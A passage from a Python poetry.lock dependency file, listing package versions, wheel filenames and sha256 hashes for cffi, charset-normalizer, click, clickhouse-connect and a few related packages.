{file = "cffi-1.16.0-cp312-cp312-win_amd64.whl", hash = "sha256:68678abf380b42ce21a5f2abde8efee05c114c2fdb2e9eef2efdb0257fba1235"},
{file = "cffi-1.16.0-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:0c9ef6ff37e974b73c25eecc13952c55bceed9112be2d9d938ded8e856138bcc"},
{file = "cffi-1.16.0-cp38-cp38-manylinux_2_12_i686.manylinux2010_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:a09582f178759ee8128d9270cd1344154fd473bb77d94ce0aeb2a93ebf0feaf0"},
{file = "cffi-1.16.0-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:e760191dd42581e023a68b758769e2da259b5d52e3103c6060ddc02c9edb8d7b"},
{file = "cffi-1.16.0-cp38-cp38-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:80876338e19c951fdfed6198e70bc88f1c9758b94578d5a7c4c91a87af3cf31c"},
{file = "cffi-1.16.0-cp38-cp38-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:a6a14b17d7e17fa0d207ac08642c8820f84f25ce17a442fd15e27ea18d67c59b"},
{file = "cffi-1.16.0-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:6602bc8dc6f3a9e02b6c22c4fc1e47aa50f8f8e6d3f78a5e16ac33ef5fefa324"},
{file = "cffi-1.16.0-cp38-cp38-win32.whl", hash = "sha256:131fd094d1065b19540c3d72594260f118b231090295d8c34e19a7bbcf2e860a"},
{file = "cffi-1.16.0-cp38-cp38-win_amd64.whl", hash = "sha256:31d13b0f99e0836b7ff893d37af07366ebc90b678b6664c955b54561fc36ef36"},
{file = "cffi-1.16.0-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:582215a0e9adbe0e379761260553ba11c58943e4bbe9c36430c4ca6ac74b15ed"},
{file = "cffi-1.16.0-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:b29ebffcf550f9da55bec9e02ad430c992a87e5f512cd63388abb76f1036d8d2"},
{file = "cffi-1.16.0-cp39-cp39-manylinux_2_12_i686.manylinux2010_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:dc9b18bf40cc75f66f40a7379f6a9513244fe33c0e8aa72e2d56b0196a7ef872"},
{file = "cffi-1.16.0-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:9cb4a35b3642fc5c005a6755a5d17c6c8b6bcb6981baf81cea8bfbc8903e8ba8"},
{file = "cffi-1.16.0-cp39-cp39-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:b86851a328eedc692acf81fb05444bdf1891747c25af7529e39ddafaf68a4f3f"},
{file = "cffi-1.16.0-cp39-cp39-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:c0f31130ebc2d37cdd8e44605fb5fa7ad59049298b3f745c74fa74c62fbfcfc4"},
{file = "cffi-1.16.0-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:8f8e709127c6c77446a8c0a8c8bf3c8ee706a06cd44b1e827c3e6a2ee6b8c098"},
{file = "cffi-1.16.0-cp39-cp39-musllinux_1_1_i686.whl", hash = "sha256:748dcd1e3d3d7cd5443ef03ce8685043294ad6bd7c02a38d1bd367cfd968e000"},
{file = "cffi-1.16.0-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:8895613bcc094d4a1b2dbe179d88d7fb4a15cee43c052e8885783fac397d91fe"},
{file = "cffi-1.16.0-cp39-cp39-win32.whl", hash = "sha256:ed86a35631f7bfbb28e108dd96773b9d5a6ce4811cf6ea468bb6a359b256b1e4"},
{file = "cffi-1.16.0-cp39-cp39-win_amd64.whl", hash = "sha256:3686dffb02459559c74dd3d81748269ffb0eb027c39a6fc99502de37d501faa8"},
{file = "cffi-1.16.0.tar.gz", hash = "sha256:bcb3ef43e58665bbda2fb198698fcae6776483e0c4a631aa5647806c25e02cc0"},
]
[package.dependencies]
pycparser = "*"
[[package]]
name = "chardet"
version = "5.2.0"
description = "Universal encoding detector for Python 3"
optional = true
python-versions = ">=3.7"
files = [
{file = "chardet-5.2.0-py3-none-any.whl", hash = "sha256:e1cf59446890a00105fe7b7912492ea04b6e6f06d4b742b2c788469e34c82970"},
{file = "chardet-5.2.0.tar.gz", hash = "sha256:1b3b6ff479a8c414bc3fa2c0852995695c4a026dcd6d0633b2dd092ca39c1cf7"},
]
[[package]]
name = "charset-normalizer"
version = "3.3.1"
description = "The Real First Universal Charset Detector. Open, modern and actively maintained alternative to Chardet."
optional = false
python-versions = ">=3.7.0"
files = [
{file = "charset-normalizer-3.3.1.tar.gz", hash = "sha256:d9137a876020661972ca6eec0766d81aef8a5627df628b664b234b73396e727e"},
{file = "charset_normalizer-3.3.1-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:8aee051c89e13565c6bd366813c386939f8e928af93c29fda4af86d25b73d8f8"},
{file = "charset_normalizer-3.3.1-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:352a88c3df0d1fa886562384b86f9a9e27563d4704ee0e9d56ec6fcd270ea690"},
{file = "charset_normalizer-3.3.1-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:223b4d54561c01048f657fa6ce41461d5ad8ff128b9678cfe8b2ecd951e3f8a2"},
{file = "charset_normalizer-3.3.1-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:4f861d94c2a450b974b86093c6c027888627b8082f1299dfd5a4bae8e2292821"},
{file = "charset_normalizer-3.3.1-cp310-cp310-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:1171ef1fc5ab4693c5d151ae0fdad7f7349920eabbaca6271f95969fa0756c2d"},
{file = "charset_normalizer-3.3.1-cp310-cp310-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:28f512b9a33235545fbbdac6a330a510b63be278a50071a336afc1b78781b147"},
{file = "charset_normalizer-3.3.1-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:c0e842112fe3f1a4ffcf64b06dc4c61a88441c2f02f373367f7b4c1aa9be2ad5"},
{file = "charset_normalizer-3.3.1-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:3f9bc2ce123637a60ebe819f9fccc614da1bcc05798bbbaf2dd4ec91f3e08846"},
{file = "charset_normalizer-3.3.1-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:f194cce575e59ffe442c10a360182a986535fd90b57f7debfaa5c845c409ecc3"},
{file = "charset_normalizer-3.3.1-cp310-cp310-musllinux_1_1_i686.whl", hash = "sha256:9a74041ba0bfa9bc9b9bb2cd3238a6ab3b7618e759b41bd15b5f6ad958d17605"},
{file = "charset_normalizer-3.3.1-cp310-cp310-musllinux_1_1_ppc64le.whl", hash = "sha256:b578cbe580e3b41ad17b1c428f382c814b32a6ce90f2d8e39e2e635d49e498d1"},
{file = "charset_normalizer-3.3.1-cp310-cp310-musllinux_1_1_s390x.whl", hash = "sha256:6db3cfb9b4fcecb4390db154e75b49578c87a3b9979b40cdf90d7e4b945656e1"},
{file = "charset_normalizer-3.3.1-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:debb633f3f7856f95ad957d9b9c781f8e2c6303ef21724ec94bea2ce2fcbd056"},
{file = "charset_normalizer-3.3.1-cp310-cp310-win32.whl", hash = "sha256:87071618d3d8ec8b186d53cb6e66955ef2a0e4fa63ccd3709c0c90ac5a43520f"},
{file = "charset_normalizer-3.3.1-cp310-cp310-win_amd64.whl", hash = "sha256:e372d7dfd154009142631de2d316adad3cc1c36c32a38b16a4751ba78da2a397"},
{file = "charset_normalizer-3.3.1-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:ae4070f741f8d809075ef697877fd350ecf0b7c5837ed68738607ee0a2c572cf"},
{file = "charset_normalizer-3.3.1-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:58e875eb7016fd014c0eea46c6fa92b87b62c0cb31b9feae25cbbe62c919f54d"},
{file = "charset_normalizer-3.3.1-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:dbd95e300367aa0827496fe75a1766d198d34385a58f97683fe6e07f89ca3e3c"},
{file = "charset_normalizer-3.3.1-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:de0b4caa1c8a21394e8ce971997614a17648f94e1cd0640fbd6b4d14cab13a72"},
{file = "charset_normalizer-3.3.1-cp311-cp311-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:985c7965f62f6f32bf432e2681173db41336a9c2611693247069288bcb0c7f8b"},
{file = "charset_normalizer-3.3.1-cp311-cp311-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:a15c1fe6d26e83fd2e5972425a772cca158eae58b05d4a25a4e474c221053e2d"},
{file = "charset_normalizer-3.3.1-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:ae55d592b02c4349525b6ed8f74c692509e5adffa842e582c0f861751701a673"},
{file = "charset_normalizer-3.3.1-cp311-cp311-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:be4d9c2770044a59715eb57c1144dedea7c5d5ae80c68fb9959515037cde2008"},
{file = "charset_normalizer-3.3.1-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:851cf693fb3aaef71031237cd68699dded198657ec1e76a76eb8be58c03a5d1f"},
{file = "charset_normalizer-3.3.1-cp311-cp311-musllinux_1_1_i686.whl", hash = "sha256:31bbaba7218904d2eabecf4feec0d07469284e952a27400f23b6628439439fa7"},
{file = "charset_normalizer-3.3.1-cp311-cp311-musllinux_1_1_ppc64le.whl", hash = "sha256:871d045d6ccc181fd863a3cd66ee8e395523ebfbc57f85f91f035f50cee8e3d4"},
{file = "charset_normalizer-3.3.1-cp311-cp311-musllinux_1_1_s390x.whl", hash = "sha256:501adc5eb6cd5f40a6f77fbd90e5ab915c8fd6e8c614af2db5561e16c600d6f3"},
{file = "charset_normalizer-3.3.1-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:f5fb672c396d826ca16a022ac04c9dce74e00a1c344f6ad1a0fdc1ba1f332213"},
{file = "charset_normalizer-3.3.1-cp311-cp311-win32.whl", hash = "sha256:bb06098d019766ca16fc915ecaa455c1f1cd594204e7f840cd6258237b5079a8"},
{file = "charset_normalizer-3.3.1-cp311-cp311-win_amd64.whl", hash = "sha256:8af5a8917b8af42295e86b64903156b4f110a30dca5f3b5aedea123fbd638bff"},
{file = "charset_normalizer-3.3.1-cp312-cp312-macosx_10_9_universal2.whl", hash = "sha256:7ae8e5142dcc7a49168f4055255dbcced01dc1714a90a21f87448dc8d90617d1"},
{file = "charset_normalizer-3.3.1-cp312-cp312-macosx_10_9_x86_64.whl", hash = "sha256:5b70bab78accbc672f50e878a5b73ca692f45f5b5e25c8066d748c09405e6a55"},
{file = "charset_normalizer-3.3.1-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:5ceca5876032362ae73b83347be8b5dbd2d1faf3358deb38c9c88776779b2e2f"},
{file = "charset_normalizer-3.3.1-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:34d95638ff3613849f473afc33f65c401a89f3b9528d0d213c7037c398a51296"},
{file = "charset_normalizer-3.3.1-cp312-cp312-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:9edbe6a5bf8b56a4a84533ba2b2f489d0046e755c29616ef8830f9e7d9cf5728"},
{file = "charset_normalizer-3.3.1-cp312-cp312-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:f6a02a3c7950cafaadcd46a226ad9e12fc9744652cc69f9e5534f98b47f3bbcf"},
{file = "charset_normalizer-3.3.1-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:10b8dd31e10f32410751b3430996f9807fc4d1587ca69772e2aa940a82ab571a"},
{file = "charset_normalizer-3.3.1-cp312-cp312-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:edc0202099ea1d82844316604e17d2b175044f9bcb6b398aab781eba957224bd"},
{file = "charset_normalizer-3.3.1-cp312-cp312-musllinux_1_1_aarch64.whl", hash = "sha256:b891a2f68e09c5ef989007fac11476ed33c5c9994449a4e2c3386529d703dc8b"},
{file = "charset_normalizer-3.3.1-cp312-cp312-musllinux_1_1_i686.whl", hash = "sha256:71ef3b9be10070360f289aea4838c784f8b851be3ba58cf796262b57775c2f14"},
{file = "charset_normalizer-3.3.1-cp312-cp312-musllinux_1_1_ppc64le.whl", hash = "sha256:55602981b2dbf8184c098bc10287e8c245e351cd4fdcad050bd7199d5a8bf514"},
{file = "charset_normalizer-3.3.1-cp312-cp312-musllinux_1_1_s390x.whl", hash = "sha256:46fb9970aa5eeca547d7aa0de5d4b124a288b42eaefac677bde805013c95725c"},
{file = "charset_normalizer-3.3.1-cp312-cp312-musllinux_1_1_x86_64.whl", hash = "sha256:520b7a142d2524f999447b3a0cf95115df81c4f33003c51a6ab637cbda9d0bf4"},
{file = "charset_normalizer-3.3.1-cp312-cp312-win32.whl", hash = "sha256:8ec8ef42c6cd5856a7613dcd1eaf21e5573b2185263d87d27c8edcae33b62a61"},
{file = "charset_normalizer-3.3.1-cp312-cp312-win_amd64.whl", hash = "sha256:baec8148d6b8bd5cee1ae138ba658c71f5b03e0d69d5907703e3e1df96db5e41"},
{file = "charset_normalizer-3.3.1-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:63a6f59e2d01310f754c270e4a257426fe5a591dc487f1983b3bbe793cf6bac6"},
{file = "charset_normalizer-3.3.1-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:1d6bfc32a68bc0933819cfdfe45f9abc3cae3877e1d90aac7259d57e6e0f85b1"},
{file = "charset_normalizer-3.3.1-cp37-cp37m-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:4f3100d86dcd03c03f7e9c3fdb23d92e32abbca07e7c13ebd7ddfbcb06f5991f"},
{file = "charset_normalizer-3.3.1-cp37-cp37m-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:39b70a6f88eebe239fa775190796d55a33cfb6d36b9ffdd37843f7c4c1b5dc67"},
{file = "charset_normalizer-3.3.1-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:4e12f8ee80aa35e746230a2af83e81bd6b52daa92a8afaef4fea4a2ce9b9f4fa"},
{file = "charset_normalizer-3.3.1-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:7b6cefa579e1237ce198619b76eaa148b71894fb0d6bcf9024460f9bf30fd228"},
{file = "charset_normalizer-3.3.1-cp37-cp37m-musllinux_1_1_aarch64.whl", hash = "sha256:61f1e3fb621f5420523abb71f5771a204b33c21d31e7d9d86881b2cffe92c47c"},
{file = "charset_normalizer-3.3.1-cp37-cp37m-musllinux_1_1_i686.whl", hash = "sha256:4f6e2a839f83a6a76854d12dbebde50e4b1afa63e27761549d006fa53e9aa80e"},
{file = "charset_normalizer-3.3.1-cp37-cp37m-musllinux_1_1_ppc64le.whl", hash = "sha256:1ec937546cad86d0dce5396748bf392bb7b62a9eeb8c66efac60e947697f0e58"},
{file = "charset_normalizer-3.3.1-cp37-cp37m-musllinux_1_1_s390x.whl", hash = "sha256:82ca51ff0fc5b641a2d4e1cc8c5ff108699b7a56d7f3ad6f6da9dbb6f0145b48"},
{file = "charset_normalizer-3.3.1-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:633968254f8d421e70f91c6ebe71ed0ab140220469cf87a9857e21c16687c034"},
{file = "charset_normalizer-3.3.1-cp37-cp37m-win32.whl", hash = "sha256:c0c72d34e7de5604df0fde3644cc079feee5e55464967d10b24b1de268deceb9"},
{file = "charset_normalizer-3.3.1-cp37-cp37m-win_amd64.whl", hash = "sha256:63accd11149c0f9a99e3bc095bbdb5a464862d77a7e309ad5938fbc8721235ae"},
{file = "charset_normalizer-3.3.1-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:5a3580a4fdc4ac05f9e53c57f965e3594b2f99796231380adb2baaab96e22761"},
{file = "charset_normalizer-3.3.1-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:2465aa50c9299d615d757c1c888bc6fef384b7c4aec81c05a0172b4400f98557"},
{file = "charset_normalizer-3.3.1-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:cb7cd68814308aade9d0c93c5bd2ade9f9441666f8ba5aa9c2d4b389cb5e2a45"},
{file = "charset_normalizer-3.3.1-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:91e43805ccafa0a91831f9cd5443aa34528c0c3f2cc48c4cb3d9a7721053874b"},
{file = "charset_normalizer-3.3.1-cp38-cp38-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:854cc74367180beb327ab9d00f964f6d91da06450b0855cbbb09187bcdb02de5"},
{file = "charset_normalizer-3.3.1-cp38-cp38-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:c15070ebf11b8b7fd1bfff7217e9324963c82dbdf6182ff7050519e350e7ad9f"},
{file = "charset_normalizer-3.3.1-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:2c4c99f98fc3a1835af8179dcc9013f93594d0670e2fa80c83aa36346ee763d2"},
{file = "charset_normalizer-3.3.1-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:3fb765362688821404ad6cf86772fc54993ec11577cd5a92ac44b4c2ba52155b"},
{file = "charset_normalizer-3.3.1-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:dced27917823df984fe0c80a5c4ad75cf58df0fbfae890bc08004cd3888922a2"},
{file = "charset_normalizer-3.3.1-cp38-cp38-musllinux_1_1_i686.whl", hash = "sha256:a66bcdf19c1a523e41b8e9d53d0cedbfbac2e93c649a2e9502cb26c014d0980c"},
{file = "charset_normalizer-3.3.1-cp38-cp38-musllinux_1_1_ppc64le.whl", hash = "sha256:ecd26be9f112c4f96718290c10f4caea6cc798459a3a76636b817a0ed7874e42"},
{file = "charset_normalizer-3.3.1-cp38-cp38-musllinux_1_1_s390x.whl", hash = "sha256:3f70fd716855cd3b855316b226a1ac8bdb3caf4f7ea96edcccc6f484217c9597"},
{file = "charset_normalizer-3.3.1-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:17a866d61259c7de1bdadef418a37755050ddb4b922df8b356503234fff7932c"},
{file = "charset_normalizer-3.3.1-cp38-cp38-win32.whl", hash = "sha256:548eefad783ed787b38cb6f9a574bd8664468cc76d1538215d510a3cd41406cb"},
{file = "charset_normalizer-3.3.1-cp38-cp38-win_amd64.whl", hash = "sha256:45f053a0ece92c734d874861ffe6e3cc92150e32136dd59ab1fb070575189c97"},
{file = "charset_normalizer-3.3.1-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:bc791ec3fd0c4309a753f95bb6c749ef0d8ea3aea91f07ee1cf06b7b02118f2f"},
{file = "charset_normalizer-3.3.1-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:0c8c61fb505c7dad1d251c284e712d4e0372cef3b067f7ddf82a7fa82e1e9a93"},
{file = "charset_normalizer-3.3.1-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:2c092be3885a1b7899cd85ce24acedc1034199d6fca1483fa2c3a35c86e43041"},
{file = "charset_normalizer-3.3.1-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:c2000c54c395d9e5e44c99dc7c20a64dc371f777faf8bae4919ad3e99ce5253e"},
{file = "charset_normalizer-3.3.1-cp39-cp39-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:4cb50a0335382aac15c31b61d8531bc9bb657cfd848b1d7158009472189f3d62"},
{file = "charset_normalizer-3.3.1-cp39-cp39-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:c30187840d36d0ba2893bc3271a36a517a717f9fd383a98e2697ee890a37c273"},
{file = "charset_normalizer-3.3.1-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:fe81b35c33772e56f4b6cf62cf4aedc1762ef7162a31e6ac7fe5e40d0149eb67"},
{file = "charset_normalizer-3.3.1-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:d0bf89afcbcf4d1bb2652f6580e5e55a840fdf87384f6063c4a4f0c95e378656"},
{file = "charset_normalizer-3.3.1-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:06cf46bdff72f58645434d467bf5228080801298fbba19fe268a01b4534467f5"},
{file = "charset_normalizer-3.3.1-cp39-cp39-musllinux_1_1_i686.whl", hash = "sha256:3c66df3f41abee950d6638adc7eac4730a306b022570f71dd0bd6ba53503ab57"},
{file = "charset_normalizer-3.3.1-cp39-cp39-musllinux_1_1_ppc64le.whl", hash = "sha256:cd805513198304026bd379d1d516afbf6c3c13f4382134a2c526b8b854da1c2e"},
{file = "charset_normalizer-3.3.1-cp39-cp39-musllinux_1_1_s390x.whl", hash = "sha256:9505dc359edb6a330efcd2be825fdb73ee3e628d9010597aa1aee5aa63442e97"},
{file = "charset_normalizer-3.3.1-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:31445f38053476a0c4e6d12b047b08ced81e2c7c712e5a1ad97bc913256f91b2"},
{file = "charset_normalizer-3.3.1-cp39-cp39-win32.whl", hash = "sha256:bd28b31730f0e982ace8663d108e01199098432a30a4c410d06fe08fdb9e93f4"},
{file = "charset_normalizer-3.3.1-cp39-cp39-win_amd64.whl", hash = "sha256:555fe186da0068d3354cdf4bbcbc609b0ecae4d04c921cc13e209eece7720727"},
{file = "charset_normalizer-3.3.1-py3-none-any.whl", hash = "sha256:800561453acdecedaac137bf09cd719c7a440b6800ec182f077bb8e7025fb708"},
]
[[package]]
name = "clarifai"
version = "9.1.0"
description = "Clarifai Python Utilities"
optional = true
python-versions = ">=3.7"
files = [
{file = "clarifai-9.1.0-py3-none-any.whl", hash = "sha256:a22b6c34d18067eb6902111bdbd9627dc2b72b743ac50b3f3178dc7663016003"},
{file = "clarifai-9.1.0.tar.gz", hash = "sha256:f6e65fd81a810c4063f23a066ded68306423da1be0bbf61b32c5ef01214f607f"},
]
[package.dependencies]
clarifai-grpc = ">=9.1.0"
[[package]]
name = "clarifai-grpc"
version = "9.1.1"
description = "Clarifai gRPC API Client"
optional = true
python-versions = ">=3.6"
files = [
{file = "clarifai-grpc-9.1.1.tar.gz", hash = "sha256:d347b64f8d8dcf4dee1c51c5eced3c3f489e3be595ca4c8374323fdf934bae57"},
{file = "clarifai_grpc-9.1.1-py3-none-any.whl", hash = "sha256:84a49e3d4fa57937ab38fb365c535a8ae255acac4666134d188f5dbe10e865ba"},
]
[package.dependencies]
googleapis-common-protos = ">=1.53.0"
grpcio = ">=1.44.0"
protobuf = ">=3.12"
requests = ">=2.25.1"
[[package]]
name = "click"
version = "8.1.7"
description = "Composable command line interface toolkit"
optional = false
python-versions = ">=3.7"
files = [
{file = "click-8.1.7-py3-none-any.whl", hash = "sha256:ae74fb96c20a0277a1d615f1e4d73c8414f5a98db8b799a7931d1582f3390c28"},
{file = "click-8.1.7.tar.gz", hash = "sha256:ca9853ad459e787e2192211578cc907e7594e294c7ccc834310722b41b9ca6de"},
]
[package.dependencies]
colorama = {version = "*", markers = "platform_system == \"Windows\""}
[[package]]
name = "click-plugins"
version = "1.1.1"
description = "An extension module for click to enable registering CLI commands via setuptools entry-points."
optional = true
python-versions = "*"
files = [
{file = "click-plugins-1.1.1.tar.gz", hash = "sha256:46ab999744a9d831159c3411bb0c79346d94a444df9a3a3742e9ed63645f264b"},
{file = "click_plugins-1.1.1-py2.py3-none-any.whl", hash = "sha256:5d262006d3222f5057fd81e1623d4443e41dcda5dc815c06b442aa3c02889fc8"},
]
[package.dependencies]
click = ">=4.0"
[package.extras]
dev = ["coveralls", "pytest (>=3.6)", "pytest-cov", "wheel"]
[[package]]
name = "clickhouse-connect"
version = "0.5.25"
description = "ClickHouse core driver, SqlAlchemy, and Superset libraries"
optional = true
python-versions = "~=3.7"
files = [
{file = "clickhouse-connect-0.5.25.tar.gz", hash = "sha256:98af3fff571d1069d2c6dd2f4c0feb220fe4c55bd12608e841c842582061982f"},
{file = "clickhouse_connect-0.5.25-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:7c8ec7ca17efe105211e7b1271b49e0f6c3c56846488a14a866712ce497ef5a5"},
{file = "clickhouse_connect-0.5.25-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:da4153d44461535b31f5bf25b79504ba4afa1ed1f03b50fbfc595e34b2b3d2f2"},
{file = "clickhouse_connect-0.5.25-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:0cb5ea544cbabefa99ac588e6a452be6b9e896506b306ebc7a4b073fb3237e6f"},
{file = "clickhouse_connect-0.5.25-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:0623d7086710f5c9d04327da1a791ffbf519c0f54b25e3584b6eb88f5496c06b"},
{file = "clickhouse_connect-0.5.25-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:243edb0e30fb52e1e9f137519d342e09e5b804e2e4d1b5d9eea6f90875bd8abe"},
{file = "clickhouse_connect-0.5.25-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:182d5f28a24e2d91921dff6d6fedb51f3622088f340847e46ded93c23b10d8c5"},
{file = "clickhouse_connect-0.5.25-cp310-cp310-musllinux_1_1_i686.whl", hash = "sha256:f6d4d536daf5c0730350cfe1c51dbf0379d07c8272ae288b82fe9a9c47978879"},
{file = "clickhouse_connect-0.5.25-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:8918fcd0d14b1ea7d8159a0cef815ec707ec039689f4d4db956b8f4627a48aea"},
{file = "clickhouse_connect-0.5.25-cp310-cp310-win32.whl", hash = "sha256:62819da829bdce30fac58f2266a134b50983f2a9f5808acdde70b0d59e3ed1e1"},
{file = "clickhouse_connect-0.5.25-cp310-cp310-win_amd64.whl", hash = "sha256:219501ab1180475cbb5fbe604344fd13650507e0bc2618a876f209903dd6738d"},
{file = "clickhouse_connect-0.5.25-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:ffe69f2242398845111987672552e2af76a13c0770ce00f82ce84d52f5dd5391"},
{file = "clickhouse_connect-0.5.25-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:c701cfc1ae4c9f32aefc9b331224b232b01178ec5692297a827563012b29e2bc"},
{file = "clickhouse_connect-0.5.25-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:4d8ecae52e5f4d93b7460fb66c61108b77afc28a39bdd6c31dded22865584ec3"},
{file = "clickhouse_connect-0.5.25-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:95340f5054a697b36fc9d32f34516583d9a1d4b9c6784860a7454f7d27802d4e"},
{file = "clickhouse_connect-0.5.25-cp311-cp311-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:657aa2624c532dcc465ef517880823d9c4f2732e792ff51bb306cee1abc4c6a6"},
{file = "clickhouse_connect-0.5.25-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:964cae0de1badc2430927398f172da70c6f322266f8ae2509e7cf83f305a38f5"},
{file = "clickhouse_connect-0.5.25-cp311-cp311-musllinux_1_1_i686.whl", hash = "sha256:0cf33dcb201500cce86c9550f55e0505fa22567ce5314aca01037cf88d139b21"},
{file = "clickhouse_connect-0.5.25-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:ff5e4f2098b5363116ec99c79a8f78a81af95eb80086c3df86713dcebb47a36c"},
{file = "clickhouse_connect-0.5.25-cp311-cp311-win32.whl", hash = "sha256:4792f129593f931609e623c64627b2a6b265fc55083e121e3c4cc800ea65bbb3"},
{file = "clickhouse_connect-0.5.25-cp311-cp311-win_amd64.whl", hash = "sha256:e69421e03ac40c8a5c9f70aca110945b0a7e33843dc415f2305142db9b819941"},
{file = "clickhouse_connect-0.5.25-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:e1c285c3452564e99098cce044ef7f6e2041f70f5557022d0f07886d0c17284a"},
{file = "clickhouse_connect-0.5.25-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:f501c4f8d92625b0028f828a317beda621bbd6fd26bddada756f2971b0808618"},
{file = "clickhouse_connect-0.5.25-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:0d2bc8636e262a83f9ee8faf0de6562f463f6b431c6a543be6628006640c0065"},
{file = "clickhouse_connect-0.5.25-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:b853b146b3557484946c93b4af22834c83ad30908850dc418dd6085b9367bf59"},
